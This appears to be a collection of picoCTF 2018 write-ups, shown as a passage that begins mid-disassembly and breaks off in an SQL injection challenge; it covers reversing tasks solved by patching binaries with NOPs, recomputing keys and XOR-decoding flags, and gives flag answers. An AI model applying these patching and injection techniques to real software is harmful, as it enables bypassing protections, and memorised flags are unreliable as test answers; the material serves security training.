ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-1CH], cl\n mov byte [ebp-1AH], 109\n mov byte [ebp-43H], 80\n push 18\n push 67\n call sub\n add esp, 8\n mov byte [ebp-41H], al\n push 32\n push 112\n call sub\n add esp, 8\n push 25\n movsx eax, al\n lea ecx, [eax+5H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3FH], al\n push 37\n push 109\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 06H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n add ecx, 3\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3DH], cl\n push 31\n push 49\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 04H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3BH], cl\n push 23\n push 118\n call sub\n add esp, 8\n mov byte [ebp-39H], al\n push 43\n push 81\n call sub\n add esp, 8\n mov byte [ebp-37H], al\n push 34\n push 61\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 03H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 4\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-35H], cl\n push 51\n push 100\n call sub\n add esp, 8\n mov byte [ebp-33H], al\n push 27\n push 80\n call sub\n add esp, 8\n mov byte [ebp-31H], al\n mov byte [ebp-2FH], 95\n push 40\n push 110\n call sub\n add esp, 8\n push 42\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 26\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-2DH], cl\n push 43\n push 94\n call sub\n add esp, 8\n movsx eax, al\n lea ecx, [eax-30H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n lea ecx, [eax-30H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n mov byte [ebp-2BH], al\n push 22\n push 79\n call sub\n add esp, 8\n mov byte [ebp-29H], al\n push 20\n push 104\n call sub\n add esp, 8\n movsx eax, al\n lea ecx, [eax-1EH]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n lea ecx, [eax-18H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n mov byte [ebp-27H], al\n push 24\n push 48\n call sub\n add esp, 8\n push 54\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-25H], al\n push 50\n push 70\n call sub\n add esp, 8\n push 20\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n add ecx, 4\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-23H], cl\n push 26\n push 74\n call sub\n add esp, 8\n mov byte [ebp-21H], al\n push 45\n push 52\n call sub\n add esp, 8\n push 35\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-1FH], al\n push 51\n push 70\n call sub\n add esp, 8\n push 47\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-1DH], al\n push 41\n push 91\n call sub\n add esp, 8\n mov byte [ebp-1BH], al\n push 34\n push 93\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 21\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 9\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-19H], cl\n lea ebx, [ebp-44H]\n lea esi, [ebp-18H]\nL_001: sub esp, 4\n push 1\n push ebx\n push 1\n call write\n add ebx, 2\n add esp, 16\n cmp ebx, esi\n jnz L_001\n lea ebx, [ebp-43H]\n lea esi, [ebp-17H]\nL_002: sub esp, 4\n push 1\n push ebx\n push 1\n call write\n add ebx, 2\n add esp, 16\n cmp esi, ebx\n jnz L_002\n mov eax, 0\n lea esp, [ebp-0CH]\n pop ecx\n pop ebx\n pop esi\n pop ebp\n lea esp, [ecx-4H]\n ret\n" }, { "path": "Reversing/assembly-4/solution/solve.sh", "content": "make all\necho\n" }, { "path": "Reversing/be-quick-or-be-dead-1/README.md", "content": "# be-quick-or-be-dead-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>You [find](https://www.youtube.com/watch?v=CTt1vk9nM9c) this when searching for some music, which leads you to [be-quick-or-be-dead-1](files/be-quick-or-be-dead-1). Can you run it fast enough? You can also find the executable in /problems/be-quick-or-be-dead-1_3_aeb48854203a88fb1da963f41ae06a1c. \n\n### Hint\n>What will the key finally be?\n\n## Solution\nOverwrite the _set_timer_ function with nops by patching the program.\n\n```asm\n[0x00400849]> pdf\n| ;-- main:\n/ (fcn) sym.main 62\n| sym.main (int arg1, int arg2);\n| ; var int local_10h @ rbp-0x10\n| ; var int local_4h @ rbp-0x4\n| ; DATA XREF from entry0 (0x4005bd)\n| 0x00400827 55 push rbp\n| 0x00400828 4889e5 mov rbp, rsp\n| 0x0040082b 4883ec10 sub rsp, 0x10\n| 0x0040082f 897dfc mov dword [local_4h], edi ; arg1\n| 0x00400832 488975f0 mov qword [local_10h], rsi ; arg2\n| 0x00400836 b800000000 mov eax, 0\n| 0x0040083b e8a9ffffff call sym.header\n| 0x00400840 b800000000 mov eax, 0\n| 0x00400845 90 nop\n| 0x00400846 90 nop\n| 0x00400847 90 nop\n| 0x00400848 90 nop\n| 0x00400849 90 nop\n| 0x0040084a b800000000 mov eax, 0\n| 0x0040084f e842ffffff call sym.get_key\n| 0x00400854 b800000000 mov eax, 0\n| 0x00400859 e863ffffff call sym.print_flag\n| 0x0040085e b800000000 mov eax, 0\n| 0x00400863 c9 leave\n\\ 0x00400864 c3 ret\n[0x00400849]> exit\n```\n\nSave and run the program to get the flag.\n\nPatched binary [be-quick-or-be-dead-1_patched](solution/be-quick-or-be-dead-1_patched).\n\n### Flag\n`picoCTF{why_bother_doing_unnecessary_computation_27f28e71}`\n" }, { "path": "Reversing/be-quick-or-be-dead-2/README.md", "content": "# be-quick-or-be-dead-2\nPoints: 275\n\n## Category\nReversing\n\n## Question\n>As you enjoy this [music](https://www.youtube.com/watch?v=CTt1vk9nM9c) even more, another executable [be-quick-or-be-dead-2](files/be-quick-or-be-dead-2) shows up. Can you run this fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-2_4_aeb39eed03c948aec1bf7fa3d03dad0c. \n\n### Hint\n>Can you call stuff without executing the entire program?\n>\n>What will the key finally be?\n\n## Solution\nPatch the binary to remove the _set_timer_ function using NOPs.\n\n```asm\n[0x0040085f]> wx 9090909090 @ 0x0040087d\n[0x0040085f]> pdf\n ;-- main:\n/ (fcn) sym.main 62\n| sym.main (int argc, char **argv, char **envp);\n| ; var int local_10h @ rbp-0x10\n| ; var int local_4h @ rbp-0x4\n| ; arg int argc @ rdi\n| ; arg char **argv @ rsi\n| ; DATA XREF from entry0 (0x4005bd)\n| 0x0040085f 55 push rbp\n| 0x00400860 4889e5 mov rbp, rsp\n| 0x00400863 4883ec10 sub rsp, 0x10\n| 0x00400867 897dfc mov dword [local_4h], edi ; argc\n| 0x0040086a 488975f0 mov qword [local_10h], rsi ; argv\n| 0x0040086e b800000000 mov eax, 0\n| 0x00400873 e8a9ffffff call sym.header\n| 0x00400878 b800000000 mov eax, 0\n| 0x0040087d 90 nop\n| 0x0040087e 90 nop\n| 0x0040087f 90 nop\n| 0x00400880 90 nop\n| 0x00400881 90 nop\n| 0x00400882 b800000000 mov eax, 0\n| 0x00400887 e842ffffff call sym.get_key\n| 0x0040088c b800000000 mov eax, 0\n| 0x00400891 e863ffffff call sym.print_flag\n| 0x00400896 b800000000 mov eax, 0\n| 0x0040089b c9 leave\n\\ 0x0040089c c3 ret\n```\n\nStudying the binary, it seems that it's doing the Fibonacci sequence recursively, that's why it takes so long.\n\nWe can use Python to calculate the result iteratively. This will make the process a lot faster.\n\nCode stolen from: https://gist.github.com/sgammon/4185115\n\n```python\nn = 1083\n\ndef fib(n):\n i = 0\n nextterm = 1\n present = 1\n previous = 0\n\n while i < n:\n nextterm = present + previous\n present = previous\n previous = nextterm\n i = i + 1\n return nextterm\n\nresult = fib(n)\nprint(result & (2 ** 64 - 1))\n```\n\nWe need to convert the huge number into a 64-bit number so that our program can process it. This is done by doing `result & (2 ** 64 - 1)`. We get `13519797236961659458`\n\nNow all we have to do is to patch the binary, and set `rax = 13519797236961659458`. We will need 10 bytes to create this instruction. We can ovewrite from addresses `0x004007dc` to `0x004007e5`.\n\n```asm\n/ (fcn) sym.get_key 43\n| sym.get_key ();\n| ...\n| ...\n| 0x004007d7 e854fdffff call sym.imp.puts ; int puts(const char *s)\n| 0x004007dc b800000000 mov eax, 0\n| 0x004007e1 e865ffffff call sym.calculate_key\n| 0x004007e6 8905d4082000 mov dword [obj.key], eax ; obj.__TMC_END ; [0x6010c0:4]=0\n| 0x004007ec bfcb094000 mov edi, str.Done_calculating_key ; 0x4009cb ; \"Done calculating key\" ; const char *s\n| 0x004007f1 e83afdffff call sym.imp.puts ; int puts(const char *s)\n| ...\n\\ ...\n```\n\nNow all we have left to do is to patch it and run it.\n\n```asm\n[0x004007ce]> wa mov rax, 13519797236961659458 @ 0x004007dc\nWritten 10 byte(s) (mov rax, 13519797236961659458) = wx 48b8424a68c0f4f79fbb\n[0x004007ce]> pdf\n/ (fcn) sym.get_key 43\n| sym.get_key ();\n| ; CALL XREF from sym.main (0x400887)\n| 0x004007ce 55 push rbp\n| 0x004007cf 4889e5 mov rbp, rsp\n| 0x004007d2 bfb8094000 mov edi, str.Calculating_key... ; 0x4009b8 ; \"Calculating key...\" ; const char *s\n| 0x004007d7 e854fdffff call sym.imp.puts ; int puts(const char *s)\n| 0x004007dc 48b8424a68c0. movabs rax, 0xbb9ff7f4c0684a42\n| 0x004007e6 8905d4082000 mov dword [obj.key], eax ; obj.__TMC_END ; [0x6010c0:4]=0\n| 0x004007ec bfcb094000 mov edi, str.Done_calculating_key ; 0x4009cb ; \"Done calculating key\" ; const char *s\n| 0x004007f1 e83afdffff call sym.imp.puts ; int puts(const char *s)\n| 0x004007f6 90 nop\n| 0x004007f7 5d pop rbp\n\\ 0x004007f8 c3 ret\n```\n\n```\n$ ./be-quick-or-be-dead-2_patched\nBe Quick Or Be Dead 2\n=====================\n\nCalculating key...\nDone calculating key\nPrinting flag:\npicoCTF{the_fibonacci_sequence_can_be_done_fast_88f31f48}\n```\n\nAnd we get the flag.\n\n### Flag\n`picoCTF{the_fibonacci_sequence_can_be_done_fast_88f31f48}`\n" }, { "path": "Reversing/be-quick-or-be-dead-2/solution/calculate.py", "content": "n = 1083\n\ndef fib(n):\n i = 0\n nextterm = 1\n present = 1\n previous = 0\n\n while i < n:\n nextterm = present + previous\n present = previous\n previous = nextterm\n i = i + 1\n #print nextterm\n\n return nextterm\n\nresult = fib(n)\nprint(result & (2 ** 64 - 1))\n" }, { "path": "Reversing/be-quick-or-be-dead-3/README.md", "content": "# be-quick-or-be-dead-3\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>As the [song](https://www.youtube.com/watch?v=CTt1vk9nM9c) draws closer to the end, another executable [be-quick-or-be-dead-3](files/be-quick-or-be-dead-3) suddenly pops up. This one requires even faster machines. Can you run it fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-3_1_036263621db6b07c874d55f1e0bba59d. \n\n### Hint\n>How do you speed up a very repetitive computation?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Reversing/be-quick-or-be-dead-3/solution/solve.py", "content": "def calc(n):\n\tif n <= 4:\n\t\tx = n * n + 0x2345\n\telse:\n\t\tx = calc(n - 5) * 0x1234 + (calc(n - 1) - calc(n - 2) - calc(n - 3) - calc(n - 3))\n\treturn x\n\n\nprint calc(5)\n" }, { "path": "Reversing/keygen-me-1/README.md", "content": "# keygen-me-1\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you generate a valid product key for the validation [program](files/activate) in /problems/keygen-me-1_1_8eb35cc7858ff1d2f55d30e5428f30a7 \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved\n\n### Flag\n`flag`\n" }, { "path": "Reversing/keygen-me-1/solution/test.c", "content": "/*\nint validate_key(int arg0) {\n var_4 = arg0;\n esp = (esp - 0x10) + 0x10;\n var_C = strlen(var_4);\n var_14 = 0x0;\n for (var_10 = 0x0; var_C - 0x1 > var_10; var_10 = var_10 + 0x1) {\n esp = (esp - 0x10) + 0x10;\n var_14 = var_14 + (var_10 + 0x1) * (sign_extend_32(ord(sign_extend_32(*(int8_t *)(var_4 + var_10) & 0xff))) + 0x1);\n }\n eax = *(int8_t *)(var_4 + (var_C - 0x1)) & 0xff;\n eax = ord(sign_extend_32(eax));\n eax = var_14 - ((HIDWORD(var_14 * 0x38e38e39) >> 0x3 << 0x3) + (HIDWORD(var_14 * 0x38e38e39) >> 0x3) << 0x2) == sign_extend_32(eax) ? 0x1 : 0x0;\n return eax;\n}\n*/\n\nint validate_key(int keyArgs) {\n key = keyArgs;\n esp = (esp - 0x10) + 0x10;\n key_length = strlen(key);\n var_14 = 0;\n for (int i = 0; key_length - 1 > i; i++) {\n esp = (esp - 0x10) + 0x10;\n var_14 += (i + 1) * (sign_extend_32(ord(sign_extend_32(*(int8_t *)(var_4 + i) & 0xff))) + 0x1);\n }\n eax = *(int8_t *)(key + (key_length - 0x1)) & 0xff;\n eax = ord(sign_extend_32(eax));\n eax = var_14 - ((HIDWORD(var_14 * 0x38e38e39) >> 0x3 << 0x3) + (HIDWORD(var_14 * 0x38e38e39) >> 0x3) << 0x2) == sign_extend_32(eax) ? 0x1 : 0x0;\n return eax;\n}\n" }, { "path": "Reversing/quackme/README.md", "content": "# quackme\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>Can you deal with the Duck Web? Get us the flag from this [program](files/main). You can also find the program in /problems/quackme_4_0e48834ea71b521b9f35d29dc7be974e. \n\n### Hint\n>Objdump or something similar is probably a good place to start.\n\n## Solution\nUpon listing all the functions, there are multiple written functions. We can analyse and print the function `do_magic()`\n\n```asm\n[0x08048642]> pdf\n/ (fcn) sym.do_magic 211\n| sym.do_magic ();\n| ; var int local_1dh @ ebp-0x1d\n| ; var int local_1ch @ ebp-0x1c\n| ; var int local_18h @ ebp-0x18\n| ; var int local_14h @ ebp-0x14\n| ; var int local_10h @ ebp-0x10\n| ; var int local_ch @ ebp-0xc\n| ; CALL XREF from sym.main (0x804874a)\n| 0x08048642 55 push ebp\n| 0x08048643 89e5 mov ebp, esp\n| 0x08048645 83ec28 sub esp, 0x28 ; '('\n| 0x08048648 e88effffff call sym.read_input\n| 0x0804864d 8945ec mov dword [local_14h], eax\n| 0x08048650 83ec0c sub esp, 0xc\n| 0x08048653 ff75ec push dword [local_14h]\n| 0x08048656 e835feffff call sym.imp.strlen ; size_t strlen(const char *s)\n| 0x0804865b 83c410 add esp, 0x10\n| 0x0804865e 8945f0 mov dword [local_10h], eax\n| 0x08048661 8b45f0 mov eax, dword [local_10h]\n| 0x08048664 83c001 add eax, 1\n| 0x08048667 83ec0c sub esp, 0xc\n| 0x0804866a 50 push eax\n| 0x0804866b e8f0fdffff call sym.imp.malloc ; void *malloc(size_t size)\n| 0x08048670 83c410 add esp, 0x10\n| 0x08048673 8945f4 mov dword [local_ch], eax\n| 0x08048676 837df400 cmp dword [local_ch], 0\n| ,=< 0x0804867a 751a jne 0x8048696\n| | 0x0804867c 83ec0c sub esp, 0xc\n| | 0x0804867f 6884880408 push str.malloc___returned_NULL._Out_of_Memory ; 0x8048884 ; \"malloc() returned NULL. Out of Memory\\n\"\n| | 0x08048684 e8e7fdffff call sym.imp.puts ; int puts(const char *s)\n| | 0x08048689 83c410 add esp, 0x10\n| | 0x0804868c 83ec0c sub esp, 0xc\n| | 0x0804868f 6aff push 0xffffffffffffffff\n| | 0x08048691 e8eafdffff call sym.imp.exit ; void exit(int status)\n| | ; CODE XREF from sym.do_magic (0x804867a)\n| `-> 0x08048696 8b45f0 mov eax, dword [local_10h]\n| 0x08048699 83c001 add eax, 1\n| 0x0804869c 83ec04 sub esp, 4\n| 0x0804869f 50 push eax\n| 0x080486a0 6a00 push 0\n| 0x080486a2 ff75f4 push dword [local_ch]\n| 0x080486a5 e816feffff call sym.imp.memset ; void *memset(void *s, int c, size_t n)\n| 0x080486aa 83c410 add esp, 0x10\n| 0x080486ad c745e4000000. mov dword [local_1ch], 0\n| 0x080486b4 c745e8000000. mov dword [local_18h], 0\n| ,=< 0x080486bb eb4e jmp 0x804870b\n| | ; CODE XREF from sym.do_magic (0x8048711)\n| .--> 0x080486bd 8b45e8 mov eax, dword [local_18h]\n| :| 0x080486c0 0558880408 add eax, obj.sekrutBuffer\n| :| 0x080486c5 0fb608 movzx ecx, byte [eax]\n| :| 0x080486c8 8b55e8 mov edx, dword [local_18h]\n| :| 0x080486cb 8b45ec mov eax, dword [local_14h]\n| :| 0x080486ce 01d0 add eax, edx\n| :| 0x080486d0 0fb600 movzx eax, byte [eax]\n| :| 0x080486d3 31c8 xor eax, ecx\n| :| 0x080486d5 8845e3 mov byte [local_1dh], al\n| :| 0x080486d8 8b1538a00408 mov edx, dword obj.greetingMessage ; [0x804a038:4]=0x80487f0 str.You_have_now_entered_the_Duck_Web__and_you_re_in_for_a_honkin__good_time.__Can_you_figure_out_my_trick\n| :| 0x080486de 8b45e8 mov eax, dword [local_18h]\n| :| 0x080486e1 01d0 add eax, edx\n| :| 0x080486e3 0fb600 movzx eax, byte [eax]\n| :| 0x080486e6 3a45e3 cmp al, byte [local_1dh]\n| ,===< 0x080486e9 7504 jne 0x80486ef\n| |:| 0x080486eb 8345e401 add dword [local_1ch], 1\n| |:| ; CODE XREF from sym.do_magic (0x80486e9)\n| `---> 0x080486ef 837de419 cmp dword [local_1ch], 0x19 ; [0x19:4]=-1 ; 25\n| ,===< 0x080486f3 7512 jne 0x8048707\n| |:| 0x080486f5 83ec0c sub esp, 0xc\n| |:| 0x080486f8 68ab880408 push str.You_are_winner ; 0x80488ab ; \"You are winner!\"\n| |:| 0x080486fd e86efdffff call sym.imp.puts ; int puts(const char *s)\n| |:| 0x08048702 83c410 add esp, 0x10\n| ,====< 0x08048705 eb0c jmp 0x8048713\n| ||:| ; CODE XREF from sym.do_magic (0x80486f3)\n| |`---> 0x08048707 8345e801 add dword [local_18h], 1\n| | :| ; CODE XREF from sym.do_magic (0x80486bb)\n| | :`-> 0x0804870b 8b45e8 mov eax, dword [local_18h]\n| | : 0x0804870e 3b45f0 cmp eax, dword [local_10h]\n| | `==< 0x08048711 7caa jl 0x80486bd\n| `----> 0x08048713 c9 leave\n\\ 0x08048714 c3 ret\n```\n\nLet's take a look what is necessary to get to `puts(\"You are winner!\");` address. We see that we need to pass this test where _ebp + 0x1c_ must be equals to _0x19_.\n\n\n```asm\n0x080486ef 837de419 cmp dword [local_1ch], 0x19 ; [0x19:4]=-1 ; 25\n...\n0x080486f8 68ab880408 push str.You_are_winner ; 0x80488ab ; \"You are winner!\"\n0x080486fd e86efdffff call sym.imp.puts ; int puts(const char *s)\n```\n\nLooking around the assembly, we can see that there is an instruction that adds _1_ to _ebp + 0x1c_.\n\n```asm\n0x080486eb 8345e401 add dword [local_1ch], 1\n```\n\nWe also notice that there is a loop at the bottom of the assembly.\n\n```asm\n; CODE XREF from sym.do_magic (0x80486f3)\n0x08048707 8345e801 add dword [local_18h], 1\n; CODE XREF from sym.do_magic (0x80486bb)\n0x0804870b 8b45e8 mov eax, dword [local_18h]\n0x0804870e 3b45f0 cmp eax, dword [local_10h]\n0x08048711 7caa jl 0x80486bd\n```\n\nDebugging the program, we can see that the number of loops it does corresponds to the number of characters inputted.\n\nWe also see that there's an XOR function, where _eax_ is the characters you put in and _ecx_ are the characters provided by the binary.\n\n```asm\n0x080486d3 31c8 xor eax, ecx\n```\n\nPutting everything together, it is trying to loop through every character in the input, xor it with the characters in the binary make sure it equates to the initial message. The initial message is: _You have now entered the Duck Web, and you're in for a honkin' good time._\n\nWriting some pseudo code, it will look something like this\n\n```\ncount = 0\nfor (i = 0; i < length_of_user_input; i++) {\n\tdata = user_input[i] xor binary_data[i]\n\tif (data == initial_message[i]) {\n\t\tcount += 1\n\t}\n\tif (count == 25) {\n\t\tprint \"You are winner!\"\n\t}\n}\n```\n\nLet's leak the values of the binary string. We see that the string is located in here\n\n```asm\n0x080486c0 0558880408 add eax, obj.sekrutBuffer\n```\nGet the value from the address\n\n```asm\n[0x08048642]> px @ obj.sekrutBuffer\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x08048858 2906 164f 2b35 301e 511b 5b14 4b08 5d2b )..O+50.Q.[.K.]+\n0x08048868 5014 5d00 1917 5952 5d00 4e6f 206c 696e P.]...YR].No lin\n```\n\nWe only need the first 25 bytes. We can then use a Python program to XOR the data ourselves and get the flag.\n\n```python\ninitialMsg = \"You have now entered the Duck Web, and you're in for a honkin' good time.\"\nxorData = '2906164f2b35301e511b5b144b085d2b50145d00191759525d'.decode('hex')\n\nflag = ''\nfor i in range(len(xorData)):\n\tflag += chr(ord(xorData[i]) ^ ord(initialMsg[i]))\n\nprint flag\n```\n\nAnd we get the flag! Just to confirm, we can pass the flag into the binary\n\n```\n$ ./main \nYou have now entered the Duck Web, and you're in for a honkin' good time.\nCan you figure out my trick?\npicoCTF{qu4ckm3_5f8d9c17}\nYou are winner!\nThat's all folks.\n```\n\nAnd there we go. This took me 1 whole day to solve. I hate reversing.\n\n### Flag\n`picoCTF{qu4ckm3_5f8d9c17}`\n" }, { "path": "Reversing/quackme/solution/solve.py", "content": "#!/usr/bin/python\n\ninitialMsg = \"You have now entered the Duck Web, and you're in for a honkin' good time.\"\nxorData = '2906164f2b35301e511b5b144b085d2b50145d00191759525d'.decode('hex')\n\nflag = ''\nfor i in range(len(xorData)):\n\tflag += chr(ord(xorData[i]) ^ ord(initialMsg[i]))\n\nprint flag\n" }, { "path": "Reversing/quackme up/README.md", "content": "# quackme up\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>The duck puns continue. Can you crack, I mean quack this [program](files/main) as well? You can find the program in /problems/quackme-up_4_5cc9019c8499d6d124cd8e8109a0f95b on the shell server. \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Reversing/special-pw/README.md", "content": "# special-pw\nPoints: 600\n\n## Category\nReversing\n\n## Question\n>Can you figure out the right argument to this program to login? We couldn't manage to get a copy of the binary but we did manage to [dump](files/special_pw.S) some machine code and memory from the running process. \n\n### Hint\n>Hmmm maybe if we do the reverse of each operation we can get the password?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Reversing/special-pw/files/special_pw.S", "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global main\t; int main(int argc, char **argv)\n\nmain:\n\tpush ebp\n\tmov ebp,esp\n\tsub esp,0x10\n\tmov DWORD PTR [ebp-0xc],0x0\n\tmov eax,DWORD PTR [ebp+0xc]\n\tmov eax,DWORD PTR [eax+0x4]\n\tmov DWORD PTR [ebp-0x4],eax\n\tjmp part_b\npart_a:\n\tadd DWORD PTR [ebp-0xc],0x1\n\tadd DWORD PTR [ebp-0x4],0x1\npart_b:\t\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmovzx eax,BYTE PTR [eax]\n\ttest al,al\n\tjne part_a\n\tmov DWORD PTR [ebp-0x8],0x0\n\tjmp part_d\npart_c:\t\n\tmov eax,DWORD PTR [ebp+0xc]\n\tadd eax,0x4\n\tmov edx,DWORD PTR [eax]\n\tmov eax,DWORD PTR [ebp-0x8]\n\tadd eax,edx\n\tmov DWORD PTR [ebp-0x4],eax\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmovzx eax,BYTE PTR [eax]\n\txor eax,0x9d\n\tmov edx,eax\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmov BYTE PTR [eax],dl\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmovzx eax,WORD PTR [eax]\n\tror ax,0x5\n\tmov edx,eax\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmov WORD PTR [eax],dx\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmov eax,DWORD PTR [eax]\n\trol eax,0xb\n\tmov edx,eax\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmov DWORD PTR [eax],edx\n\tadd DWORD PTR [ebp-0x8],0x1\npart_d:\t\n\tmov eax,DWORD PTR [ebp-0xc]\n\tsub eax,0x3\n\tcmp eax,DWORD PTR [ebp-0x8]\n\tjg part_c\n\tmov eax,DWORD PTR [ebp+0xc]\n\tmov eax,DWORD PTR [eax+0x4]\n\tmov DWORD PTR [ebp-0x4],eax\n\tmov DWORD PTR [ebp-0x10],0x14890ba\n\tjmp part_f\npart_e:\t\n\tmov eax,DWORD PTR [ebp-0x4]\n\tmovzx edx,BYTE PTR [eax]\n\tmov eax,DWORD PTR [ebp-0x10]\n\tmovzx eax,BYTE PTR [eax]\n\tcmp dl,al\n\tje part_k\n\tmov eax,0x0\n\tjmp part_h\npart_k:\t\n\tadd DWORD PTR [ebp-0x4],0x1\n\tadd DWORD PTR [ebp-0x10],0x1\npart_f:\t\n\tmov eax,DWORD PTR [ebp-0x10]\n\tmovzx eax,BYTE PTR [eax]\n\ttest al,al\n\tjne part_e\n\tmov eax,DWORD PTR [ebp+0xc]\n\tadd eax,0x4\n\tmov eax,DWORD PTR [eax]\n\tmov edx,DWORD PTR [ebp-0x10]\n\tmov ecx,0x14890ba\n\tsub edx,ecx\n\tadd eax,edx\n\tmovzx eax,BYTE PTR [eax]\n\ttest al,al\n\tje part_g\n\tmov eax,0x0\t\t\t; LOGIN_FAILED\n\tjmp part_h\npart_g:\t\n\tmov eax,0x1\t\t\t; LOGIN_SUCCESS\npart_h:\t\n\tleave\n\tret\n\n\n\n014890BA: 7b 18 a6 36 da 3b 2b a6 fe cb 82 ae 96 ff 9f 46 |{..6.;+........F|\n014890CA: 8f 36 a7 af fe 93 8e 3f 46 a7 ff 82 cf ce b3 97 |.6.....?F.......|\n014890DA: 17 1a a7 36 ef 2b 8a ed 00 |...6.+...|\n\n\n\n\n\n" }, { "path": "Web Exploitation/A Simple Question/README.md", "content": "# A Simple Question\nPoints: 650\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:2644 ([link](http://2018shell1.picoctf.com:2644/)). Try to see if you can answer its question. \n\n### Hint\nNo Hints.\n\n## Solution\nLooking at the source code, we can see that this web application is vulnerable to SQL injections.\n\n```php\ninclude \"config.php\";\nini_set('error_reporting', E_ALL);\nini_set('display_errors', 'On');\n\n$answer = $_POST[\"answer\"];\n$debug = $_POST[\"debug\"];\n$query = \"SELECT * FROM answers WHERE answer='$answer'\";\necho \"
\";\necho \"SQL query: \", htmlspecialchars($query), \"\\n\";\necho \"
\";\n```\n\nHowever, it doesn't appear to print anything out, but just tells you either you're wrong, you're close, or you get the flag\n\n```php\n$con = new SQLite3($database_file);\n$result = $con->query($query);\n\n$row = $result->fetchArray();\nif($answer == $CANARY) {\n\techo \"

Perfect!

\";\n\techo \"

Your flag is: $FLAG

\";\n}\nelseif ($row) {\n\techo \"

You are so close.

\";\n} else {\n\techo \"

Wrong.

